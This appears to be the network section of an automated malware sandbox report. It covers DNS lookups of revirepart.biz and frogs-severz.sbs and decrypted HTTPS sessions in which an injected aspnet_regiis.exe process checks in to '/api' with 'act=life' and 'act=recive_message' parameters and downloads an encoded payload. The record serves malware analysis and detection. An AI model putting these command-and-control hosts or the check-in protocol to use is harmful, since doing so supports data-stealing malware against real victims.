Nov 23, 2024 10:25:05.908144951 CET	49734	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:05.908185005 CET	443	49734	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:06.597893000 CET	443	49734	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:06.597937107 CET	443	49734	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:06.597966909 CET	443	49734	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:06.597990990 CET	443	49734	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:06.598014116 CET	49734	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:06.598026037 CET	443	49734	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:06.598088980 CET	443	49734	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:06.598140955 CET	49734	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:06.598140955 CET	49734	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:06.605808020 CET	443	49734	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:06.605912924 CET	443	49734	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:06.606014013 CET	49734	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:06.606031895 CET	443	49734	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:06.614334106 CET	443	49734	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:06.614384890 CET	49734	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:06.614403963 CET	443	49734	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:06.622677088 CET	443	49734	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:06.622737885 CET	49734	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:06.622761011 CET	443	49734	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:06.674992085 CET	49734	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:06.789493084 CET	443	49734	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:06.793265104 CET	443	49734	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:06.793337107 CET	443	49734	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:06.793335915 CET	49734	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:06.793387890 CET	49734	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:06.800611973 CET	49734	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:06.800657034 CET	443	49734	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:06.800683022 CET	49734	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:06.800700903 CET	443	49734	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:07.097143888 CET	49737	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:07.097232103 CET	443	49737	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:07.097327948 CET	49737	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:07.097650051 CET	49737	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:07.097698927 CET	443	49737	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:08.400733948 CET	443	49737	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:08.400820017 CET	49737	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:08.402050018 CET	49737	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:08.402076960 CET	443	49737	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:08.402288914 CET	443	49737	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:08.409656048 CET	49737	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:08.409841061 CET	49737	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:08.409884930 CET	443	49737	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:08.409960985 CET	49737	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:08.409979105 CET	443	49737	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:10.172521114 CET	443	49737	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:10.172604084 CET	443	49737	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:10.172668934 CET	49737	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:10.172784090 CET	49737	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:10.172840118 CET	443	49737	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:10.269525051 CET	49740	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:10.269566059 CET	443	49740	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:10.269620895 CET	49740	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:10.270113945 CET	49740	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:10.270126104 CET	443	49740	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:11.575505972 CET	443	49740	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:11.575584888 CET	49740	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:11.577189922 CET	49740	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:11.577198029 CET	443	49740	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:11.577404976 CET	443	49740	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:11.585436106 CET	49740	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:11.585597038 CET	49740	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:11.585628033 CET	443	49740	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:12.351083994 CET	443	49740	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:12.351166010 CET	443	49740	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:12.351340055 CET	49740	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:12.351408005 CET	49740	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:12.351423979 CET	443	49740	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:12.540808916 CET	49742	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:12.540837049 CET	443	49742	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:12.540920019 CET	49742	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:12.541270018 CET	49742	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:12.541282892 CET	443	49742	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:13.846067905 CET	443	49742	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:13.846175909 CET	49742	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:13.852065086 CET	49742	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:13.852085114 CET	443	49742	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:13.852267981 CET	443	49742	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:13.859141111 CET	49742	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:13.859240055 CET	49742	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:13.859276056 CET	443	49742	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:13.859349966 CET	49742	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:13.859359026 CET	443	49742	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:14.718240023 CET	443	49742	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:14.718313932 CET	443	49742	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:14.718368053 CET	49742	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:14.723893881 CET	49742	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:14.723916054 CET	443	49742	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:15.297740936 CET	49744	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:15.297837019 CET	443	49744	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:15.297941923 CET	49744	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:15.298384905 CET	49744	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:15.298417091 CET	443	49744	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:16.603773117 CET	443	49744	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:16.603880882 CET	49744	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:16.605113983 CET	49744	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:16.605149031 CET	443	49744	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:16.605484009 CET	443	49744	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:16.607104063 CET	49744	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:16.607194901 CET	49744	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:16.607208014 CET	443	49744	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:17.316509008 CET	443	49744	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:17.316622972 CET	443	49744	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:17.316716909 CET	49744	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:17.316848040 CET	49744	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:17.316888094 CET	443	49744	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:17.434503078 CET	49747	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:17.434545994 CET	443	49747	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:17.434742928 CET	49747	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:17.435230017 CET	49747	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:17.435245991 CET	443	49747	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:18.738053083 CET	443	49747	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:18.738157034 CET	49747	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:18.739310026 CET	49747	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:18.739331007 CET	443	49747	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:18.739566088 CET	443	49747	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:18.740592957 CET	49747	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:18.740683079 CET	49747	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:18.740689993 CET	443	49747	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:20.152298927 CET	443	49747	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:20.152429104 CET	443	49747	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:20.152510881 CET	49747	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:20.152630091 CET	49747	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:20.152647018 CET	443	49747	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:20.188637972 CET	49749	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:20.188680887 CET	443	49749	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:20.188764095 CET	49749	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:20.189080000 CET	49749	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:20.189102888 CET	443	49749	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:21.447834969 CET	443	49749	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:21.447906971 CET	49749	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:21.449721098 CET	49749	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:21.449729919 CET	443	49749	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:21.450056076 CET	443	49749	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:21.451354980 CET	49749	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:21.451383114 CET	49749	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:21.451437950 CET	443	49749	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:22.151319981 CET	443	49749	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:22.151463032 CET	443	49749	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:22.151509047 CET	49749	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:22.151844978 CET	49749	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:22.151861906 CET	443	49749	104.21.88.250	192.168.2.4
Nov 23, 2024 10:25:22.151879072 CET	49749	443	192.168.2.4	104.21.88.250
Nov 23, 2024 10:25:22.151886940 CET	443	49749	104.21.88.250	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 23, 2024 10:25:00.042087078 CET	56745	53	192.168.2.4	1.1.1.1
Nov 23, 2024 10:25:00.350687981 CET	53	56745	1.1.1.1	192.168.2.4
Nov 23, 2024 10:25:02.369648933 CET	55435	53	192.168.2.4	1.1.1.1
Nov 23, 2024 10:25:02.599664927 CET	53	55435	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 23, 2024 10:25:00.042087078 CET	192.168.2.4	1.1.1.1	0x9f3e	Standard query (0)	revirepart.biz	A (IP address)	IN (0x0001)	false
Nov 23, 2024 10:25:02.369648933 CET	192.168.2.4	1.1.1.1	0xee2d	Standard query (0)	frogs-severz.sbs	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Nov 23, 2024 10:25:00.350687981 CET	1.1.1.1	192.168.2.4	0x9f3e	No error (0)	revirepart.biz	104.21.43.198	A (IP address)	IN (0x0001)	false
Nov 23, 2024 10:25:00.350687981 CET	1.1.1.1	192.168.2.4	0x9f3e	No error (0)	revirepart.biz	172.67.184.174	A (IP address)	IN (0x0001)	false
Nov 23, 2024 10:25:02.599664927 CET	1.1.1.1	192.168.2.4	0xee2d	No error (0)	frogs-severz.sbs	104.21.88.250	A (IP address)	IN (0x0001)	false
Nov 23, 2024 10:25:02.599664927 CET	1.1.1.1	192.168.2.4	0xee2d	No error (0)	frogs-severz.sbs	172.67.155.47	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

revirepart.biz

frogs-severz.sbs

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	104.21.43.198	443	7728	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 09:25:01 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: revirepart.biz
2024-11-23 09:25:01 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-11-23 09:25:02 UTC	1011	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 09:25:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=23silfq477v9bo4g4cvehhhfvi; expires=Wed, 19 Mar 2025 03:11:41 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MeUdikMcFrU00IJTlIIl5gUUhi95hMXtbll5c45jCOkleMvCIeZHJ40R5d4WLjeR5NZ9xxCP0NedKMdIWXK7%2Fxr4blC4zHqZfejrsUFV%2FBn4oCQ9vaTDtExsZzmG5jB%2Bjw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e701c0f2dfa4400-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1605&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2833&recv_bytes=905&delivery_rate=1815920&cwnd=155&unsent_bytes=0&cid=81411e1381eb181a&ts=697&x=0"
2024-11-23 09:25:02 UTC	9	IN	Data Raw: 34 0d 0a 66 61 69 6c 0d 0a Data Ascii: 4fail
2024-11-23 09:25:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	104.21.88.250	443	7728	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 09:25:03 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: frogs-severz.sbs
2024-11-23 09:25:03 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-11-23 09:25:04 UTC	1005	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 09:25:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=q1un3acrkb8op2uigkr0fpb1c5; expires=Wed, 19-Mar-2025 03:11:43 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w7w8GIerBXfh2vW8LixNNncubinFPOm0SO5rnfo7%2Ffko0DcDc5XKHvSKDQa%2BcsoHDwOVU2qezZZY1CqUWnXILGilR9b3k7sKj24USpqol4ztgC7Wma2qQ07kvFsH5CZBbWfy"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e701c1d2834430a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1823&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1592148&cwnd=234&unsent_bytes=0&cid=59f8a078e99d8b8f&ts=718&x=0"
2024-11-23 09:25:04 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-11-23 09:25:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49734	104.21.88.250	443	7728	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 09:25:05 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 86 Host: frogs-severz.sbs
2024-11-23 09:25:05 UTC	86	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 62 38 62 62 38 36 30 65 31 65 65 32 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--b8bb860e1ee2&j=b9abc76ce53b6fc3a03566f8f764f5ea
2024-11-23 09:25:06 UTC	1003	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 09:25:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=re082bm4rhh2lnr1n0gqp5fsdl; expires=Wed, 19-Mar-2025 03:11:45 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ubc7OVg9HIoSMyM19H8hXj0KenKGlTJKvDZb0WQXpwbd9qi10G7VC4YEuKXaDzg03jckXVqSrb3Rdw6QUbRxabRYRHLHFfR%2FYlCX8NowGIV6AmToXOGxt0VsFCVelCMHcYN5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e701c29a8894369-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2122&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=986&delivery_rate=1345622&cwnd=230&unsent_bytes=0&cid=e9ea72a8b55a3f72&ts=702&x=0"
2024-11-23 09:25:06 UTC	366	IN	Data Raw: 31 64 37 32 0d 0a 49 4b 5a 6e 78 71 44 50 42 2f 2f 52 7a 6f 77 54 73 62 30 44 5a 7a 70 34 4f 76 54 75 35 6c 66 44 4c 57 73 54 48 6e 69 65 57 75 35 62 68 42 48 6b 6d 76 73 72 33 61 4b 72 72 69 6e 58 33 47 38 55 58 31 51 59 6c 59 72 45 62 61 56 4d 42 32 42 37 56 4c 77 73 67 77 4b 63 41 61 66 4d 76 47 4c 54 38 36 76 30 4d 59 76 6d 65 45 56 66 46 68 6a 4f 7a 49 4d 39 6f 55 77 48 63 58 38 54 38 53 71 43 51 38 34 4c 6f 63 69 71 5a 4a 75 77 6f 75 46 32 31 4e 68 69 44 56 51 52 56 35 79 44 78 48 76 68 53 42 45 78 4a 46 72 54 50 35 70 42 36 77 61 31 79 2b 31 36 30 36 72 73 36 58 32 54 68 79 45 47 58 78 70 57 6b 6f 71 4e 50 36 74 46 44 33 42 36 45 75 34 7a 69 45 6a 4f 42 61 4c 4a 6f 47 32 50 76 61 6a 6d 66 64 4c 53 59 6b 55 57 57 6c 2b 4f 7a 4e 78 31 38 6e 30 4b 59 Data Ascii: 1d72IKZnxqDPB//RzowTsb0DZzp4OvTu5lfDLWsTHnieWu5bhBHkmvsr3aKrrinX3G8UX1QYlYrEbaVMB2B7VLwsgwKcAafMvGLT86v0MYvmeEVfFhjOzIM9oUwHcX8T8SqCQ84LociqZJuwouF21NhiDVQRV5yDxHvhSBExJFrTP5pB6wa1y+1606rs6X2ThyEGXxpWkoqNP6tFD3B6Eu4ziEjOBaLJoG2PvajmfdLSYkUWWl+OzNx18n0KY
2024-11-23 09:25:06 UTC	1369	IN	Data Raw: 61 67 78 56 46 31 69 62 68 6f 73 32 6f 55 67 44 65 33 4d 51 2b 44 57 42 52 4d 51 46 35 49 7a 74 59 6f 58 7a 39 4b 35 53 31 73 39 6d 43 55 35 59 59 74 61 54 79 69 7a 68 53 41 55 78 4a 46 72 30 50 59 39 42 7a 77 71 6e 79 71 5a 33 6e 61 47 71 34 33 54 42 32 57 51 4c 55 68 6c 4b 6e 49 4b 43 4e 71 68 45 41 48 52 37 48 72 78 32 7a 45 58 63 52 66 79 43 6a 47 69 57 76 36 62 35 63 5a 50 41 4c 78 77 59 48 56 54 57 31 4d 51 78 6f 45 73 49 64 58 49 55 2b 44 53 4b 54 4d 6b 4b 6f 73 69 74 59 70 65 37 70 4f 39 38 32 4e 42 68 41 46 55 65 58 70 71 4e 67 58 58 76 44 77 35 70 50 45 4b 38 46 6f 74 42 31 6b 65 52 77 61 4e 72 6d 71 58 73 38 54 2f 4b 6e 32 59 4a 47 45 49 59 6d 49 6d 4c 4a 36 42 64 44 48 39 75 46 76 6b 2b 67 55 48 4b 42 61 48 46 6f 47 75 62 74 4b 2f 6d 64 64 4c Data Ascii: agxVF1ibhos2oUgDe3MQ+DWBRMQF5IztYoXz9K5S1s9mCU5YYtaTyizhSAUxJFr0PY9BzwqnyqZ3naGq43TB2WQLUhlKnIKCNqhEAHR7Hrx2zEXcRfyCjGiWv6b5cZPALxwYHVTW1MQxoEsIdXIU+DSKTMkKositYpe7pO982NBhAFUeXpqNgXXvDw5pPEK8FotB1keRwaNrmqXs8T/Kn2YJGEIYmImLJ6BdDH9uFvk+gUHKBaHFoGubtK/mddL
2024-11-23 09:25:06 UTC	1369	IN	Data Raw: 45 49 59 6d 6f 57 45 50 71 74 4c 43 58 5a 78 48 2f 38 2f 6a 30 2f 44 44 36 72 46 71 57 6d 55 76 71 72 75 64 74 66 61 63 77 42 52 46 6c 54 57 77 73 51 79 75 51 39 52 4d 56 4d 64 36 6a 75 6a 51 64 55 4d 35 4e 33 6a 66 4e 32 30 6f 4b 34 70 6b 39 68 6b 44 56 4d 63 55 4a 61 65 67 54 75 71 54 67 4e 33 66 52 66 77 50 6f 78 44 78 41 4f 6f 77 71 70 69 6a 36 47 70 36 47 50 5a 6e 79 39 46 58 77 49 59 7a 73 79 79 4a 62 5a 65 48 7a 4e 4a 47 66 49 32 69 31 53 45 47 75 72 62 37 57 4b 52 38 2f 53 75 65 74 50 54 5a 67 31 65 48 6c 43 5a 67 34 30 6e 6f 45 4d 48 59 33 73 61 39 54 61 44 54 73 30 49 6f 38 2b 6d 62 35 43 33 71 2b 38 78 6e 5a 39 6d 48 52 68 43 47 4b 43 63 69 54 6d 50 52 41 56 34 50 41 57 79 49 63 78 46 79 45 58 38 67 71 6c 70 6c 62 6d 6a 35 33 76 5a 30 47 67 46 Data Ascii: EIYmoWEPqtLCXZxH/8/j0/DD6rFqWmUvqrudtfacwBRFlTWwsQyuQ9RMVMd6jujQdUM5N3jfN20oK4pk9hkDVMcUJaegTuqTgN3fRfwPoxDxAOowqpij6Gp6GPZny9FXwIYzsyyJbZeHzNJGfI2i1SEGurb7WKR8/SuetPTZg1eHlCZg40noEMHY3sa9TaDTs0Io8+mb5C3q+8xnZ9mHRhCGKCciTmPRAV4PAWyIcxFyEX8gqlplbmj53vZ0GgF
2024-11-23 09:25:06 UTC	1369	IN	Data Raw: 6a 4d 67 79 33 68 46 30 6c 65 57 79 2b 2b 47 62 59 43 32 30 75 39 67 71 70 70 33 65 76 73 34 6e 4c 66 31 32 34 44 55 52 5a 53 6e 34 65 49 50 71 56 44 41 48 52 36 47 2f 6b 39 6a 55 62 49 44 36 4c 42 72 6d 71 53 76 4b 53 75 50 35 50 59 65 55 55 41 57 6e 32 42 68 34 6f 7a 34 56 42 48 61 44 77 64 38 48 6a 55 41 73 67 4d 6f 73 53 6f 61 5a 79 31 70 4f 74 35 31 39 35 6e 41 31 73 56 58 4a 4f 4e 69 7a 47 74 51 51 4e 77 66 52 62 33 4e 34 64 48 68 45 76 6b 78 62 55 6c 78 66 4f 64 37 57 66 45 7a 32 31 46 52 31 52 42 31 6f 75 49 64 66 6b 50 43 47 4e 32 45 50 49 39 67 30 66 48 43 71 50 50 71 32 6d 58 75 71 54 6f 66 74 72 4e 59 67 6c 57 48 56 61 61 67 6f 6b 2f 6f 6b 4a 4a 50 7a 77 64 35 48 6a 55 41 75 67 43 71 65 79 6d 61 5a 72 7a 73 36 42 6f 6b 39 68 74 52 51 42 61 56 Data Ascii: jMgy3hF0leWy++GbYC20u9gqpp3evs4nLf124DURZSn4eIPqVDAHR6G/k9jUbID6LBrmqSvKSuP5PYeUUAWn2Bh4oz4VBHaDwd8HjUAsgMosSoaZy1pOt5195nA1sVXJONizGtQQNwfRb3N4dHhEvkxbUlxfOd7WfEz21FR1RB1ouIdfkPCGN2EPI9g0fHCqPPq2mXuqToftrNYglWHVaagok/okJJPzwd5HjUAugCqeymaZrzs6Bok9htRQBaV
2024-11-23 09:25:06 UTC	1369	IN	Data Raw: 6c 73 55 78 4c 51 47 6f 5a 36 6a 4f 42 54 6f 51 61 36 74 76 74 59 70 48 7a 39 4b 35 33 33 4e 5a 69 43 6c 6b 54 56 4a 75 4a 6a 54 43 67 53 51 31 37 64 68 72 36 50 6f 31 48 7a 67 61 6c 79 4b 52 69 6c 62 53 76 2f 44 47 64 6e 32 59 64 47 45 49 59 76 34 75 57 4f 37 45 50 46 6a 39 6c 57 76 73 30 7a 42 71 45 41 61 37 4e 71 57 4b 52 74 61 6e 6f 66 4e 4c 51 59 41 56 58 48 6c 4f 66 69 6f 55 34 70 45 49 4e 59 33 59 52 38 7a 53 46 54 73 6c 46 36 6f 4b 71 66 64 33 72 37 4e 39 38 33 64 46 6d 45 78 67 46 46 6f 2f 4d 67 7a 6e 68 46 30 6c 77 63 42 58 2f 4e 34 39 42 78 51 2b 32 30 4b 46 73 6c 62 61 67 35 58 2f 56 7a 57 63 4b 55 52 6c 62 6e 34 75 4d 4f 61 74 4d 44 6a 45 79 57 76 73 67 7a 42 71 45 4a 72 50 53 6f 43 57 43 2f 62 57 75 64 74 2b 66 4f 55 56 51 46 31 43 63 69 49 Data Ascii: lsUxLQGoZ6jOBToQa6tvtYpHz9K533NZiClkTVJuJjTCgSQ17dhr6Po1HzgalyKRilbSv/DGdn2YdGEIYv4uWO7EPFj9lWvs0zBqEAa7NqWKRtanofNLQYAVXHlOfioU4pEINY3YR8zSFTslF6oKqfd3r7N983dFmExgFFo/MgznhF0lwcBX/N49BxQ+20KFslbag5X/VzWcKURlbn4uMOatMDjEyWvsgzBqEJrPSoCWC/bWudt+fOUVQF1CciI
